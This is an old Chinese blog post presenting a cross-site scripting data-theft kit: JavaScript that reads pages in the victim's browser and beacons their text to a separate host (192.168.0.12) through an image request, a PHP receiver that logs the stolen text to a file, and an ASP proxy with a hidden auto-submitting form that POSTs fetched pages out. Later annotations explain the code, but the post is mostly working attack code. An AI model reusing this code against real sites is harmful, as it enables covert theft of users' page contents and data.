xss文件页面内容读取(解决)


Posted in Javascript on November 28, 2010

js:

// IE-only: attaches the legacy "#default#Download" DHTML behavior, whose
// startDownload(url, callback) method fetches the text of a same-origin URL
// and hands it to the callback. Modern browsers have no such API.
document.body.addBehavior("#default#Download"); 
// Relative paths of the pages to be read; resolved against the document this
// script is running in.
var mycars = new Array(); 
mycars[0] = "l.htm"; 
mycars[1] = "y.htm"; 
for (x in mycars ) 
{ 
// startDownload calls GetData itself with the fetched text; `source` is not
// declared anywhere in this script, so the direct call below is a reference
// to an undefined name (left as on the page).
if(document.body.startDownload(mycars[x],GetData)){ 
GetData(source); 
} 
} function GetData(source) 
{ 
// Callback: escape() percent-encodes the page text (non-ASCII as %uXXXX, which
// the PHP receiver's unescape() expects) and forwards it. `txt` is an implicit
// global (no var).
txt=escape(source); 
getReaded(txt); 
} 
function getReaded(usr) { 
// Exfiltration beacon: the encoded text leaves the browser as the "key" query
// parameter of an image request to a third-party host. The request never
// renders anything; the newlines wrapped around the payload end up in the
// receiving server's access log and are the artefact to look for when
// reviewing logs for this pattern.
var newimg = new Image(); 
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n"; 
}

php:

<?php 
// Receiver for the image beacon above. Declares the response charset; the
// script itself prints nothing and only appends to a file further down.
header('Content-Type:text/html;charset=GB2312'); 
/**
 * Reverse of JavaScript's escape(): percent-decodes $str and then expands the
 * %uXXXX, &#xXXXX; and &#NNNN; forms to UTF-8 characters.
 *
 * Tokenising is done with an ungreedy regex, so any other character is kept
 * one at a time; note that "." does not match a newline, so newlines in the
 * decoded input are dropped from the result.
 *
 * @param string $str percent-encoded text (may contain %u / numeric entities)
 * @return string decoded UTF-8 text
 */
function unescape($str) { 
    $str = rawurldecode($str); 
    preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r); 
    $pieces = $r[0]; 
    $out = array(); 
    foreach ($pieces as $piece) { 
        $head2 = substr($piece,0,2); 
        if ($head2 == "%u") { 
            // %uXXXX: four hex digits -> UCS-2 code unit 
            $out[] = iconv("UCS-2","UTF-8",pack("H4",substr($piece,-4))); 
        } elseif (substr($piece,0,3) == "&#x") { 
            // &#xXXXX; : same, hex digits between the prefix and ";" 
            $out[] = iconv("UCS-2","UTF-8",pack("H4",substr($piece,3,-1))); 
        } elseif ($head2 == "&#") { 
            // &#NNNN; : decimal code point packed as a 16-bit big-endian value 
            $out[] = iconv("UCS-2","UTF-8",pack("n",substr($piece,2,-1))); 
        } else { 
            $out[] = $piece; 
        } 
    } 
    return implode("", $out); 
} 
// Unvalidated sink: whatever arrives in ?key= is decoded and appended to
// news.html (path relative to the script's working directory). Nothing is
// checked, the handle returned by fopen() is never closed, and if news.html is
// ever served as a page this endpoint is itself a stored-content injection point.
$file="news.html"; 
$_GET['key']=unescape($_GET['key']); 
fputs(fopen($file,'a+'),$_GET['key']); 
?>

=================================================以下通用了===============
<% 
' Buffer the whole response so getHTTPPage can Response.Clear / Response.End
' for binary content without partial output already having been sent.
Response.Buffer = True 
' sUrlB is script-level state written by PageWebProxy and read by getHTTPPage
' (the target URL with its query string stripped). send(0..2) holds escaped
' page bodies; only two of the three slots are filled below.
Dim sUrlB,send(2) 
' Server-side fetch of two pages on a private-address host, link-rewritten by
' PageWebProxy and Escape()d so the result can be embedded in the JavaScript
' emitted after the %> block.
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm")) 
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm")) 
' Fetches the page at xmlpath on the server side and rewrites its links so that
' every reference resolves through this proxy. Returns the rewritten HTML, or
' Empty when getHTTPPage did not return a body (binary content is written
' straight to the response there). Side effect: sets the script-level sUrlB to
' the target URL without its query string.
' NOTE(review): whatever URL is passed in is fetched by this server; if xmlpath
' ever comes from request input this is an open server-side fetch and should be
' restricted to an allow-list of hosts.
function PageWebProxy(xmlpath) 
Dim i, re, Url, Html 
' Two statements on one line as published; VBScript needs ":" or a line break
' between "Url = xmlpath" and "Set re = New RegExp".
Url = xmlpath Set re = New RegExp 
re.IgnoreCase = True 
re.Global = True 
sUrlB = Url 
Html = getHTTPPage(Url) 
' Url becomes the target's base directory (everything up to the last "/").
Url = Left(Url, InStrRev(Url, "/")) 
i = InStr(sUrlB, "?") 
If i > 0 Then 
sUrlB = Left(sUrlB, i - 1) 
End If 
' Links that are only a "?query" are anchored to the query-less target URL.
re.Pattern = "(href|action)=(\'|"")?(\?)" 
Html = re.Replace(Html,"$1=$2" & sUrlB & "?") 
' Absolute http/https/javascript links are parked as "srcx="/"actionx="/"hrefx="
' so the relative-link rewriting below leaves them alone; restored further down.
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2$3$2") 
' Same parking for window.open(...) / url(...) with absolute URLs.
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1x($2$3$2)") 
' Relative paths (not starting with "/" or a quote) are prefixed with the base directory.
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2" & Url & "$3$2") 
' Root-relative paths get scheme + host; Split(Url, "/")(2) is the host part of
' "http://host/...".
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2") 
' A bare "/" becomes the host root.
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2") 
' window.open(...) / url(...): relative and root-relative forms, same rules as above.
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2" & Url & "$3$2)") 
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)") 
' "&" is masked as "%26" and a fixed set of entities is then expanded by hand;
' club.isso.com.cn is a site-specific special case that keeps "&amp;" masked.
Html = Replace(Html, "&", "%26") 
If Split(Url, "/")(2) = "club.isso.com.cn" Then 
Html = Replace(Html, "%26amp;", "%26") 
Else 
Html = Replace(Html, "%26amp;", "&") 
End If 
Html = Replace(Html, "%26nbsp;", " ") 
Html = Replace(Html, "%26lt;", "<") 
Html = Replace(Html, "%26gt;", ">") 
Html = Replace(Html, "%26quot;", """) 
Html = Replace(Html, "%26copy;", "©") 
Html = Replace(Html, "%26reg;", "®") 
Html = Replace(Html, "%26raquo;", "»") 
Html = Replace(Html, "%26%26", "&&") 
Html = Replace(Html, "%26#", "&#") 
' Html = Replace(Html, "%26", "") 
' Restore the parked absolute links ("srcx=" -> "src=" etc.).
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2$3$2") 
' Every remaining absolute http(s) URL is prefixed with "?url=" so it routes
' back through this proxy rather than to the origin directly.
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))" 
Html = re.Replace(Html,"?url=$1") 
' "?url=<base>#..." / "?url=<base>javascript:..." collapse back to the fragment
' or script. Url is interpolated into the pattern unescaped, so its "." and "?"
' act as regex metacharacters here.
re.Pattern = "\?url=" & Url & "(#|javascript:)" 
Html = re.Replace(Html,"$1") 
' Forms are forced off multipart encoding because getHTTPPage re-posts
' Request.Form as application/x-www-form-urlencoded.
re.Pattern = "multipart\/form-data" 
Html = re.Replace(Html,"") 
PageWebProxy=Html 
End function 
' Fetches url with MSXML2.XMLHTTP. If the current request carried form fields
' they are re-encoded and POSTed to the target, otherwise a GET is issued.
' Image/script extensions are streamed straight to the client and the request
' ends; archive/binary extensions are flushed as an attachment; anything else is
' decoded as GB2312 and returned as a string. Returns Empty when the request did
' not complete or when the content was written to the response directly.
Function getHTTPPage(url) 
Dim Http, theStr, fileExt 
Set Http = Server.CreateObject("MSXML2.XMLHTTP") 
' The caller's own POST body (every Request.Form field) is forwarded to the
' remote host -- anything a user submitted to this page is relayed onward.
' x is not declared with Dim (no Option Explicit in this block).
If Request.Form.Count > 0 Then 
For Each x In Request.Form 
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&" 
Next 
Http.Open "POST", url, False 
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" 
Http.Send(theStr) 
Else 
Http.Open "GET", url, False 
Http.Send() 
End If 
' Synchronous call that did not reach readyState 4: the return value stays
' Empty and Http is not released on this path.
If Http.readystate<>4 then Exit Function 
' Handling is chosen by the URL's extension, not by the response Content-Type.
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1)) 
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then 
' Raw bytes replace the whole buffered response; Response.End stops the script,
' so "Set Http = Nothing" below never runs on this path.
Response.Clear 
Response.BinaryWrite Http.responseBody 
Response.End() 
Else 
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then 
' The attachment name is the last path segment of sUrlB (set by PageWebProxy)
' and is placed in a header without validation -- NOTE(review): this relies on
' sUrlB never containing CR/LF or quote characters; verify at the call site.
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1) 
Response.BinaryWrite Http.responseBody 
Response.Flush 
Else 
' Text is assumed to be GB2312 regardless of what the remote server declared.
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312") 
End If 
End If 
Set Http = Nothing 
End Function 
' Converts a raw byte array (e.g. XMLHTTP.responseBody) to a VBScript string by
' passing it through an ADODB.Stream: the bytes are written in binary mode, the
' stream is rewound and switched to text mode, and the text is read back using
' the charset named by Cset.
Function BytesToBstr(body,Cset) 
    Dim stm 
    Set stm = Server.CreateObject("adodb.stream") 
    With stm 
        .Type = 1          ' adTypeBinary: accept the raw bytes 
        .Mode = 3          ' adModeReadWrite 
        .Open 
        .Write body 
        .Position = 0      ' rewind before re-interpreting the buffer as text 
        .Type = 2          ' adTypeText: decode on read 
        .Charset = Cset 
        BytesToBstr = .ReadText 
        .Close 
    End With 
    Set stm = Nothing 
End Function 
%> 
// Client side of the relay: writes a hidden iframe and a hidden POST form into
// the current document, fills the two hidden fields with the proxied page text
// (the server-side Escape()d values are expanded again with unescape()), and
// submits automatically with no user interaction.
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>") 
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>"); 
document.writeln("<input id=var name=var type=hidden>"); 
document.writeln("<input id=vartwo name=vartwo type=hidden>"); 
document.writeln("<input type=submit style=display:none>"); 
document.writeln("<\/form>") 
// Each value is prefixed with the URL it was fetched from so the receiving
// endpoint can tell the two pages apart.
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>'); 
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>'); 
// Targeting the hidden iframe keeps the visible page unchanged. The cross-origin
// POST is the point a CSP form-action directive or egress monitoring would flag.
document.getElementById("form").submit();